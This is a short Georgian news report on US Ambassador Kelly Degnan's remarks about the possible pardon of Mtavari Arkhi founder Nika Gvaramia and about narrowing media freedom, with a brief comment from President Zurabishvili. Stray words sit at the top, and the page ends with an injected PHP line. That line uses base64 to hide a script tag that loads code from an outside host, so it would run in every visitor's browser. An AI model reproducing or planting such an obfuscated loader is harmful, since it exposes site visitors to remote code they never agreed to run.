celsiusi
ავერსი შნაიდერი

საქართველოში აშშ-ის ელჩი კელი დეგნანი აცხადებს, რომ “მთავარი არხის” დამფუძნებლის ნიკა გვარამიას გათავისუფლებაზე გადაწვეტილება საქართველოს პრეზიდენტის პრეროგატივაა. მისივე თქმით, ქვეყანაში ბოლო პერიოდში მედიასივრცე ვიწროვდება.

„ყველამ ვიცით, რომ მედიის თავისუფლება დემოკრატიისთვის ძალიან მნიშვნელოვანია. აქ, საქართველოში, სადაც ჩვენ ვხედავთ მედიაგარემოს შევიწროებას, ვფიქრობ, მნიშვნელოვანია გზავნილია დამოუკიდებელი მედიის მხარდაჭერა. საზოგადოებას უნდა ჰქონდეს ზუსტი ინფორმაცია სხვადასხვა ხედვასთან დაკავშირებით. როცა ვხედავთ მედიაგარემოს შევიწროებას, ვფიქრობ, არსებობს რისკი, რომ საზოგადოებას არ მიუწვდება ხელი სხვადასხვაზე ხედვაზე, რის გამოც ისინი მიიღებენ არაინფორმირებულ გადაწყვეტილებას. ვიმედოვნებ, რომ საქართველოს ექნება ძლიერი დამოუკიდებელი მედია, რადგან ეს ძალიან მნიშვნელოვანია ნებისმიერი დემოკრატიისთვის, განსაკუთრებით საქართველოსთვის, რომელიც ინსტიტუტების მშენებლობის პროცესშია“, - განაცხადა დეგნანმა.
გვარამიას შეწყალებაზე სალომე ზურაბიშვილმა "ტვ პირველის" ეთერში ისაუბრა. „რაც იქნება და როგორც იქნება, თავის დროზე გეტყვით. ამაზე მეტს ვერ გეტყვით”,-თქვა პრეზიდენტმა.

265
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");